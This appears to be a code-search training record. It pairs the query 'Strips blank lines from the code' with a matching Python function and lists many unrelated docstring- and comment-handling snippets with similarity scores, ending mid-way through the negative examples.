docstring.replace(r'SBML_parseFormula()', 'antimonycs.antimony.parseFormula()')\n\n # Need to escape the quotation marks:\n\n docstring = docstring.replace('\"', \"'\")\n docstring = docstring.replace(r\"'\", r\"\\'\") \n\n return docstring", "def _add_doc(func, doc):\n func.__doc__ = doc", "def undocumented(func):\n func._undocumented_ = True\n return func", "def docstring(self, docstring): # type: (str) -> None\n self._tmp_docstring = inspect.cleandoc(docstring)", "def extract_docstring(loaded):\n\n source = loaded['cells'][0]['source']\n\n assert source[0].strip() == '\"\"\"'\n assert source[-1].strip() == '\"\"\"'\n\n return ' '.join(i.strip() for i in source[1:-1])", "def __doc__(self, ???):", "def func_doc():", "def collect_docstring(lines):\n lines = dropwhile(lambda x: not x.startswith('\"\"\"'), lines)\n doc = \"\"\n for line in lines:\n doc += line\n if doc.endswith('\"\"\"\\n'):\n break\n\n return doc[3:-4].replace(\"\\r\", \"\").replace(\"\\n\", \" \")", "def old_function_with_docstring(x, y):\n return x + y", "def clean_docs(c):\n c.run(f\"rm -fr {DOCS_BUILD_DIR}\")", "def convert_doxygen_docstring(lines, name):\n\n lines = lines[:]\n newlines = []\n indent = 0\n reading_desc = False\n\n while lines:\n line = lines.pop(0)\n if line.startswith(\"////\"):\n continue\n\n line = line.rstrip()\n if line.startswith('///<'):\n strline = line[4:]\n else:\n strline = line\n\n strline = strline.lstrip('/ \\t')\n\n if strline == \"**\" or strline == \"*/\":\n continue\n\n if strline.startswith(\"** \"):\n strline = strline[3:]\n elif strline.startswith(\"* \"):\n strline = strline[2:]\n elif strline == \"*\":\n strline = \"\"\n\n strline = strline.lstrip(' \\t')\n\n if strline.startswith('@'):\n special = strline.split(' ', 1)[0][1:]\n if special == 'par' and strline.endswith(':') and lines and '@code' in lines[0]:\n newlines.append(' '*indent + strline[5:] + ':')\n newlines.append('')\n line = lines.pop(0)\n offset = line.index('@code')\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"verbatim\" or special == \"code\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. code-block:: guess')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@endverbatim' in line or '@endcode' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == \"f[\":\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. math::')\n newlines.append('')\n offset = line.index('@' + special)\n while lines:\n line = lines.pop(0)\n if '@f]' in line:\n break\n newlines.append(' ' + line[offset:])\n\n newlines.append('')\n continue\n elif special == 'param':\n #TODO\n #if extra is not None:\n # _, name, desc = strline.split(' ', 2)\n # extra['param:' + name] = desc\n continue\n elif special == 'deprecated':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n\n # I'd love to use the proper Sphinx deprecated tag, but it\n # requires a version number, whereas Doxygen doesn't.\n newlines.append('*Deprecated:* ' + convert_doxygen_format(value, name))\n newlines.append('')\n continue\n elif special in ('brief', 'return', 'returns'):\n #TODO\n #if extra is not None:\n # _, value = strline.split(' ', 1)\n # extra[special] = value\n continue\n elif special == 'details':\n strline = strline[9:]\n elif special == 'sa' or special == 'see':\n if newlines and newlines[-1]:\n newlines.append('')\n\n _, value = strline.split(' ', 1)\n values = value.split(',')\n\n for i, value in enumerate(values):\n result = resolve_reference(value.partition('(')[0], name)\n if result:\n values[i] = ':{0}:`{1}`'.format(*result)\n else:\n values[i] = ':obj:`{0}`'.format(value)\n\n if special == 'see':\n newlines.append('See {}.'.format(', '.join(values)))\n else:\n newlines.append('See also {}.'.format(', '.join(values)))\n newlines.append('')\n continue\n elif special in ('note', 'warning'):\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. %s:: ' % (special))\n newlines.append('')\n newlines.append(' ' + convert_doxygen_format(strline[2 + len(special):], name))\n while lines and lines[0].strip(' *\\t/'):\n line = lines.pop(0).lstrip(' *\\t')\n newlines.append(' ' + convert_doxygen_format(line, name))\n\n newlines.append('')\n continue\n elif special == 'since':\n if newlines and newlines[-1]:\n newlines.append('')\n\n newlines.append('.. versionadded:: ' + strline[7:])\n newlines.append('')\n continue\n else:\n print(\"Unhandled documentation tag: @\" + special)\n\n if strline or len(newlines) > 0:\n newlines.append(' '*indent + convert_doxygen_format(strline, name))\n\n return newlines", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def docstring(\n docstring: str = None, *, pre: str = None, post: str = None\n) -> Callable[[U], U]:\n\n def edit_docstring(obj: U) -> U:\n obj.__doc__ = \"\".join(\n (\n clean_docstring(pre or \"\", unused=\"pre\"),\n clean_docstring(docstring or (obj.__doc__ or \"\")),\n clean_docstring(post or \"\", unused=\"post\"),\n )\n )\n return obj\n\n return edit_docstring", "def doc_summary(lines):\n summary = []\n for line in lines:\n stripped = line.strip().lower()\n if (stripped.startswith('to use this normalizer') or\n stripped.startswith('use ``method')):\n continue\n if (line.startswith('Parameters') or line.startswith('Example')\n or line.startswith('.. note::')):\n break\n summary.append(line)\n return summary", "def docstring(func):\n try:\n lines = func.__doc__.strip().split(\"\\n\")\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def test_doc():\n pass", "def inherits_doc():\n pass", "def test_user_func_docstrings(self):\n for func in self.user_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def get_main_help(self):\r\n return __doc__.strip()", "def test_user_func_docstrings(self):\n for func in self.student_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def doc_apply(doc):\n\n def wrapper(func):\n func.__doc__ = doc\n return func\n\n return wrapper", "async def remove_doc(self, *args, **kwargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def pydocstyle(context):\n exec_cmd = \"pydocstyle .\"\n run_cmd(context, exec_cmd)", "def getdoc(object):\r\n try:\r\n doc = object.__doc__\r\n except AttributeError:\r\n return None\r\n if not isinstance(doc, types.StringTypes):\r\n return None\r\n return cleandoc(doc)", "def task_pydocstyle():\n yield {\n 'name': os.path.join(os.getcwd(), 'nikola'),\n 'actions': [\"pydocstyle --count --match-dir='(?!^\\\\.)(?!data).*' nikola/\"],\n }", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def inheritdocstrings(cls):\n for name, func in vars(cls).items():\n if isinstance(func, types.FunctionType) and not func.__doc__:\n for parent in cls.__bases__:\n parfunc = getattr(parent, name, None)\n if parfunc and getattr(parfunc, '__doc__', None):\n func.__doc__ = parfunc.__doc__\n break\n return cls", "def rewriteDocstringForPython (docstring):\n\n # Take out the C++ comment start and end.\n\n docstring = docstring.replace('/**', '').replace('*/', '')\n p = re.compile('^(\\s*)\\*([ \\t]*)', re.MULTILINE)\n docstring = p.sub(r'\\2', docstring)\n\n # Rewrite some of the data type references to equivalent Python types.\n # (Note: this rewriting affects only the documentation comments inside\n # classes & methods, not the method signatures.)\n\n docstring = docstring.replace(r'const char *', 'string ')\n docstring = docstring.replace(r'const char* ', 'string ')\n docstring = docstring.replace(r'an unsigned int', 'a long integer')\n docstring = docstring.replace(r'unsigned int', 'long')\n docstring = docstring.replace(r'const std::string&', 'string')\n docstring = docstring.replace(r'const std::string', 'string')\n docstring = docstring.replace(r'std::string', 'string')\n docstring = docstring.replace(r'NULL', 'None')\n docstring = docstring.replace(r'@c true', '@c True')\n docstring = docstring.replace(r'@c false', '@c False')\n\n # Also use Python syntax instead of \"const XMLNode*\" etc.\n\n p = re.compile(r'const (%?)(' + r') ?(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRef, docstring) \n p = re.compile(r'(%?)(' + r') ?(\\*|&)', re.DOTALL)\n docstring = p.sub(rewriteClassRef, docstring) \n\n # Need to escape the quotation marks:\n\n docstring = docstring.replace('\"', \"'\")\n docstring = docstring.replace(r\"'\", r\"\\'\")\n\n # Python method cross-references won't be made by doxygen unless\n # the method reference is written without arguments.\n\n p = re.compile('(\\s+)(\\S+?)::(\\w+\\s*)(\\([^)]*?\\))', re.MULTILINE)\n docstring = p.sub(translatePythonCrossRef, docstring)\n p = re.compile('(@see\\s+)(\\w+\\s*)(\\([^)]*?\\))')\n docstring = p.sub(translatePythonSeeRef, docstring)\n\n # Friggin' doxygen escapes HTML character codes, so the hack we have to\n # do for Javadoc turns out doesn't work for the Python documentation.\n # Kluge around it.\n\n docstring = re.sub(r'\\\\f\\$\\\\geq\\\\f\\$', '>=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\leq\\\\f\\$', '<=', docstring)\n docstring = re.sub(r'\\\\f\\$\\\\times\\\\f\\$', '*', docstring)\n\n # SWIG does some bizarre truncation of leading characters that\n # happens to hit us because of how we have to format verbatim's.\n # This tries to kluge around it: \n p = re.compile('@verbatim.+?@endverbatim', re.DOTALL)\n docstring = p.sub(indentVerbatimForPython, docstring)\n\n return docstring", "def trim(docstring):\n if not docstring:\n return ''\n # Convert tabs to spaces (following the normal Python rules)\n # and split into a list of lines:\n lines = six.u(docstring).expandtabs().splitlines()\n lines = [line.strip() for line in lines]\n res = six.u('\\n').join(lines)\n return res", "def test_0_check_xc_docstring(self):\n self.banner(\"Checking the docstring on your extra credit.\") \n filename = self.find_file('project9_xc.py')\n self.check_docstring(filename)", "def _remove_doc(xml_str):\n result = []\n do_add = True\n for line in xml_str.splitlines():\n if '<doc:doc>' in line:\n do_add = False\n if do_add:\n result.append(line)\n if '</doc:doc>' in line:\n do_add = True\n return '\\n'.join(result)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def copy_docstring(other):\n\n def wrapper(func):\n func.__doc__ = other.__doc__\n return func\n\n return wrapper", "def _clean_doc(doc: Dict) -> Dict:\n doc['label'] = doc['labels'][config.LANG]['value']\n aliases = doc['aliases'][config.LANG] if config.LANG in doc['aliases'] else []\n\n doc['aliases'] = [alias['value'] for alias in aliases]\n\n for key in DOC_CLEAN_KEYS:\n try:\n del doc[key]\n except:\n continue\n return doc", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def remove_stopwords_fun(self):\n tokens = str(self.doc).split()\n cleaned_tokens = [token for token in tokens\n if token.lower() not in self.stopword_list]\n self.doc = ' '.join(cleaned_tokens)", "def filter_doc(doc_text):\n # remove stars\n filter_regex=re.compile(r\"[_*]\")\n doc=filter_regex.sub(\"\",doc_text)\n # substitute quotation marks\n double_quot_regex=re.compile(r\"[“”]\")\n single_quot_regex=re.compile(r\"[’‘]\")\n doc=double_quot_regex.sub('\"',doc)\n doc=single_quot_regex.sub(\"'\",doc)\n # substitute new lines inside the text for spaces\n # these new lines are usually caused by formatting texts to fit in 80 columns \n newline_quot_regex=re.compile(r\"(\\S)\\n(\\S)\")\n doc=newline_quot_regex.sub(r\"\\1 \\2\",doc)\n # remove illustration tag\n #illustration_regex=re.compile(r\"\\[Illustration.*]\")\n #doc=illustration_regex.sub(\"\",doc)\n return doc", "def docs():", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def improve_class_docstring(app, cls, lines):\n if issubclass(cls, models.Model):\n improve_model_docstring(app, cls, lines)\n elif issubclass(cls, forms.BaseForm):\n improve_form_docstring(cls, lines)", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def test_fs_func_docstrings(self):\n for func in self.fs_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def strip_docstrings(tokens):\n stack = []\n state = 'wait_string'\n for t in tokens:\n typ = t[0]\n if state == 'wait_string':\n if typ in (tokenize.NL, tokenize.COMMENT):\n yield t\n elif typ in (tokenize.DEDENT, tokenize.INDENT, tokenize.STRING):\n stack.append(t)\n elif typ == tokenize.NEWLINE:\n stack.append(t)\n start_line, end_line = stack[0][2][0], stack[-1][3][0]+1\n for i in range(start_line, end_line):\n yield tokenize.NL, '\\n', (i, 0), (i,1), '\\n'\n for t in stack:\n if t[0] in (tokenize.DEDENT, tokenize.INDENT):\n yield t[0], t[1], (i+1, t[2][1]), (i+1, t[3][1]), t[4]\n del stack[:]\n else:\n stack.append(t)\n for t in stack: yield t\n del stack[:]\n state = 'wait_newline'\n elif state == 'wait_newline':\n if typ == tokenize.NEWLINE:\n state = 'wait_string'\n yield t", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def update_docstring(instance):\n try:\n docstring = instance.api_map['doc']\n except (KeyError, TypeError):\n docstring = 'No docstring provided.'\n\n instance.__class__.__doc__ = docstring\n instance.__class__.__call__.__signature__ = construct_signature(instance)\n\n return docstring", "def main():\n system('cls||clear')\n\n #Print a docstring.\n print (main.__doc__)", "def def_textface_doctests():", "def test_dbs_func_docstrings(self):\n for func in self.dbs_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def test_dbs_func_docstrings(self):\n for func in self.dbs_f:\n self.assertIsNot(func[1].__doc__, None,\n \"{:s} method needs a docstring\".format(func[0]))\n self.assertTrue(len(func[1].__doc__) >= 1,\n \"{:s} method needs a docstring\".format(func[0]))", "def init_doc(self):\n raise NotImplementedError()", "def minimize_source(source):\n if not isinstance(source, mitogen.core.UnicodeType):\n source = source.decode('utf-8')\n tokens = tokenize.generate_tokens(StringIO(source).readline)\n tokens = strip_comments(tokens)\n tokens = strip_docstrings(tokens)\n tokens = reindent(tokens)\n return tokenize.untokenize(tokens)", "def strip_params_from_docstring(docstring):\n split_lines = trim_docstring(docstring).split('\\n')\n\n cut_off = None\n for index, line in enumerate(split_lines):\n line = line.strip()\n if PARAMS_PATTERN.search(line):\n cut_off = index\n break\n if cut_off is not None:\n split_lines = split_lines[0:cut_off]\n\n return \"\\n\".join(split_lines)", "def trim_docstring(docstring):\r\n lines = docstring.expandtabs().splitlines()\r\n\r\n # Find minimum indentation of any non-blank lines after first line.\r\n from sys import maxint\r\n margin = maxint\r\n for line in lines[1:]:\r\n content = len(line.lstrip())\r\n if content:\r\n indent = len(line) - content\r\n margin = min(margin, indent)\r\n\r\n # Remove indentation.\r\n if lines:\r\n lines[0] = lines[0].lstrip()\r\n if margin < maxint:\r\n for i in range(1, len(lines)):\r\n lines[i] = lines[i][margin:]\r\n\r\n # Remove any trailing or leading blank lines.\r\n while lines and not lines[-1]:\r\n lines.pop()\r\n while lines and not lines[0]:\r\n lines.pop(0)\r\n return '\\n'.join(lines)", "def short_doc(obj):\n if obj.__doc__:\n lines = obj.__doc__.strip(' \\n').splitlines()\n if lines:\n return lines[0]\n return None", "def test_all_docstrings():\n functions = inspect.getmembers(s7, inspect.isfunction)\n for func in functions:\n docstring = func[1].__doc__\n assert docstring, \"Wooaaahhh !! You have not written docstring for {}\".format(func[1].__str__())", "def consistent_documentation():\n\n return 3", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def docstring(func: Callable) -> list[str] | None:\n try:\n lines = func.__doc__.strip().split(\"\\n\") # type: ignore\n return [line.strip() for line in lines]\n except AttributeError:\n return None", "def test__get_doc():\n docstring = util._get_doc(\"midgard\")\n assert isinstance(docstring, str) and len(docstring) > 0", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def guess(cls, docstring):", "def getdoc(obj):\n try:\n doc = obj.__doc__\n except AttributeError:\n return None\n if not isinstance(doc, str):\n return None\n return inspect.cleandoc(doc)", "def parse_help(func):\n # Grab the raw doc\n doc = func.__doc__\n\n # Check for non-existent documentation and return a 404 message of sorts\n if not doc:\n return 'Woops, there isn\\'t any documentation for this command!'\n\n # Strip away extra newlines\n doc = doc.strip()\n # Split on (and remove) the newlines\n doc = doc.split('\\n')\n # Clean out the leading space on each line, merge the lines, and return\n return ' '.join(L.strip() for L in doc)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def remove_code_annotations(line_to_transform):\n line_to_transform = str(line_to_transform)\n line_to_transform = line_to_transform.split(' #', 1)[0]\n line_to_transform = line_to_transform.replace(':', '')\n line_to_transform = line_to_transform.replace('\\t', '')\n line_to_transform = line_to_transform.replace(' ', '')\n line_to_transform = line_to_transform.replace('\\n', '')\n line_to_transform = line_to_transform.replace('elif ', '')\n line_to_transform = line_to_transform.replace('if ', '')\n line_to_transform = line_to_transform.replace('else ', '')\n line_to_transform = line_to_transform.replace('else', '')\n line_to_transform = line_to_transform.replace('def ', '')\n line_to_transform = line_to_transform.replace('for ', '')\n line_to_transform = line_to_transform.replace('while ', '')\n return line_to_transform", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def strip_yaml_from_docstring(docstring):\n split_lines = trim_docstring(docstring).split('\\n')\n\n cut_off = None\n for index in range(len(split_lines) - 1, -1, -1):\n line = split_lines[index]\n line = line.strip()\n if line == '---':\n cut_off = index\n break\n if cut_off is not None:\n split_lines = split_lines[0:cut_off]\n\n return \"\\n\".join(split_lines)", "def _docs_params(**kwds):\n\n def dec(obj):\n obj.__orig_doc__ = obj.__doc__\n obj.__doc__ = dedent(obj.__doc__).format_map(kwds)\n return obj\n\n return dec", "def doc_sub(*sub):\n def dec(obj):\n obj.__doc__ = obj.__doc__.format(*sub)\n return obj\n return dec", "def test_doc_fun(self):\n for fun in self.functions:\n self.assertTrue(len(fun.__doc__) > 0)", "def md_docstring(docstring):\n content = []\n lines = textwrap.dedent(docstring).splitlines()\n content.append(md_escape(lines[0]))\n lines = lines[1:]\n while lines and (not lines[0] or lines[0].isspace()):\n lines = lines[1:]\n\n if not all(l.isspace() for l in lines):\n content.append(md_code('\\n'.join(lines), language=None))\n content.append('')\n return content", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def triple_quote_docs():\n return", "def parse_docs(docs):\n if not docs:\n return __name__, \"<no documentation>\"\n docs = docs.strip().split('\\n')\n for i, line in enumerate(docs):\n docs[i] = line.strip()\n return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else \"<no documentation>\"", "def _removeComments(code):\r\n # remove all occurance streamed comments (/*COMMENT */) from string\r\n text = re.sub(re.compile('/\\*.*?\\*/', re.DOTALL), '', code)\r\n # remove all occurance singleline comments (//COMMENT\\n ) from string\r\n return re.sub(re.compile('//.*?\\n'), '', text)" ]
[ "0.7418431", "0.70061356", "0.69807357", "0.697398", "0.692769", "0.6822503", "0.6774257", "0.6732609", "0.66039276", "0.64539397", "0.6381781", "0.63537943", "0.6343105", "0.62978303", "0.6271671", "0.6246473", "0.6230828", "0.6230828", "0.6230828", "0.62265724", "0.6169188", "0.61584216", "0.6123759", "0.61000675", "0.607402", "0.60697144", "0.6050962", "0.6045161", "0.602112", "0.60190713", "0.6000477", "0.59981334", "0.5997999", "0.5989179", "0.5969329", "0.59518117", "0.59124297", "0.59091175", "0.58889985", "0.5876472", "0.5872568", "0.5838108", "0.58369", "0.5830149", "0.5825831", "0.5819563", "0.58111316", "0.5798315", "0.57952166", "0.5790616", "0.578703", "0.5748159", "0.5742749", "0.57301575", "0.57301325", "0.5724095", "0.5721791", "0.57179177", "0.56983334", "0.5687046", "0.567928", "0.56737536", "0.5670126", "0.56648546", "0.5659203", "0.5641394", "0.56410813", "0.5626655", "0.5623831", "0.561544", "0.56063354", "0.5595017", "0.55932885", "0.55932885", "0.55906975", "0.5588577", "0.5586489", "0.5581303", "0.55726993", "0.5571934", "0.55643046", "0.5560398", "0.5556693", "0.5551825", "0.554143", "0.5533265", "0.5530116", "0.55292815", "0.55271244", "0.55241954", "0.5521923", "0.5502516", "0.5499995", "0.54983217", "0.5493006", "0.548639", "0.5469594", "0.54665834", "0.5465206", "0.5458908" ]
0.67054003
8
Strips blank lines from the code
def strip_blanklines(blob): lines = blob.split('\n') return '\n'.join([line for line in lines if line.strip() != ''])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_blank_lines(text):\n out_text = \"\"\n blank = True\n for line in text.splitlines(True):\n if line.isspace():\n if not blank:\n blank = True\n out_text = out_text + line\n else:\n blank = False\n out_text = out_text + line\n return out_text", "def clean_code(ls):\r\n ls = remove_white_space(ls)\r\n ls = remove_comments(ls)\r\n ls = remove_empty_lines(ls)\r\n\r\n return ls", "def remove_empty_lines(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n self.result_code = open(\"result.c\",\"w\") #Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line is empty.\n if line != \"\\n\":\n self.result_code.write(line) # Writing the non-empty line onto the intermediate file.\n self.result_code.close() # Closing the intermediate file.", "def remove_leading_whitespace_and_empty_lines(text: str) -> str:\n # We call lstrip() twice on the same line. This is inefficient but ok for small unit tests.\n # Please change it if you want to.\n return '\\n'.join([line.lstrip() for line in text.split('\\n') if line.lstrip() != ''])", "def _strip_lines(lines):\n for line in lines:\n stripped = line.strip()\n if stripped:\n yield stripped", "def _preprocess(self, source):\n source = source.replace(u'\\n', u'').strip()\n source = re.sub(r'<br\\s*\\/?\\s*>', u' ', source, re.I)\n source = re.sub(r'\\s\\s+', u' ', source)\n return source", "def no_blank_line_before_section(): # noqa: D416", "def remove_leading_blanks(self, sentence):\n pass", "def _remove_beginning_newlines(lines):\n first_non_blank_line = 0\n\n for line in lines:\n if line.strip():\n break\n\n first_non_blank_line += 1\n\n return lines[first_non_blank_line:]", "def cleanup_code(self, content):\n\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n if content[-4] == '\\n':\n return '\\n'.join(content.split('\\n')[1:-1])\n return '\\n'.join(content.split('\\n')[1:]).rstrip('`')\n\n # remove `foo`\n return content.strip('` \\n')", "def ignorableWhitespace(self, data):\n pass", "def cleanup_code(self, content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n # remove `foo`\n return content.strip('` \\n')", "def cleanup_code( content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def skipWhiteSpace(self):\n pass", "def stripText(self, rawText):\n strippedText = []\n for line in rawText:\n if line.rstrip():\n if line[0] != '#':\n strippedText.append(line.rstrip()) #also remove newline character\n return strippedText", "def clean_lines(lines):\n _lines = []\n for l in lines:\n l = l.strip().rstrip()\n if len(l) > 0:\n _lines.append(l)\n return _lines", "def __stripEol(self, txt):\n return txt.replace(\"\\r\", \"\").replace(\"\\n\", \"\")", "def cleaned_contents(self):\n snip_with_code = re.compile(\"(//.*snip(\\-file)*:?.*\\n)(\\+\\n)?(\\[.*\\]\\n)*----\\n(.*\\n)*?----\\n\", flags=re.IGNORECASE)\n cleaned = re.sub(snip_with_code, r'\\1', self.contents)\n return cleaned", "def emptyline(self):", "def contents_without_whitespace(self):\n return self.contents.replace(' ', '').replace('\\n', '')", "def _get_cleaned_script(self, script):\n script = self._add_uuids(script)\n splitted_script = script.split('\\n')\n code_lines = []\n for line in splitted_script:\n if line.strip() != '':\n code_lines.append(line)\n for i, line in enumerate(code_lines):\n if line[0] != '\\t' and line[0] != ' ':\n code_lines[i] = '\\n' + line\n script = '\\n'.join(code_lines) + '\\n'\n return script", "def _strip(lines: Sequence[str]) -> Sequence[str]:\n lines = [i.rstrip() for i in lines]\n return lines", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def cleanup_code(content):\n # remove ```py\\n```\n if content.startswith('```') and content.endswith('```'):\n return '\\n'.join(content.split('\\n')[1:-1])\n\n # remove `foo`\n return content.strip('` \\n')", "def test_file_iterator_removes_all_whitespace(self):\n for line in file_iterator('example_module.py'):\n self.assertEqual(line, line.strip())", "def remove_tab_space(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n\n self.result_code = open(\"result.c\", \"w\") # Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line begins with a white space.\n if line[0] == \" \":\n # Checking from which position the code begins over a loop, in order to remove the tab space.\n for c in range(1, len(line)):\n if line[c] != \" \":\n index = c # Making note of the position from which the code begins in the line.\n break\n self.result_code.write(line[index:]) # Writing the line without the tab space into the intermediate file.\n else:\n self.result_code.write(line) # Writing the entire line into the intermediate file in case there is no tab space at the beginning.\n\n self.result_code.close() # Closing the intermediate file.", "def remove_empty_lines(filename):\r\n with open(filename, 'r+') as f:\r\n lines = f.readlines()\r\n f.seek(0)\r\n f.writelines(line for line in lines if line.strip())\r\n f.truncate()", "def rstrip(self) -> String:\n pass", "def clean_file(file_contents):\n commentless_file = _strip_comments(file_contents)\n assembly_code = _remove_whitespace(commentless_file)\n return assembly_code", "def strip_trailing_spaces(self):\n for paragraph in self.paragraphs:\n for item in paragraph:\n lines = paragraph[item].split(\"\\n\")\n paragraph[item] = \"\\n\".join([l.rstrip() for l in lines])", "def clean(text):\n lines = text.split('\\n')\n\n indx = range(len(lines))\n indx.reverse()\n for i in indx:\n temp = lines[i].strip()\n if temp == '' or temp.startswith('#'):\n del lines[i]\n else:\n lines[i] = temp\n\n return lines", "def strip_whitespace(self, text):\n\t\treturn text.strip()", "def cleanup (text) :\n l_idx = 1\n lines = text.split ('\\n')\n\n # count leading non-empty lines\n for line in lines :\n if not line.strip () :\n l_idx += 1\n else :\n break\n\n # check if there is anything more to evaluate\n if len (lines) <= l_idx :\n return text\n\n # determine indentation of that line\n indent = 0\n for c in lines[l_idx] :\n if c == ' ' :\n indent += 1\n else : \n break\n\n # if nothing found, check the following line\n if not indent :\n\n if len (lines) <= l_idx + 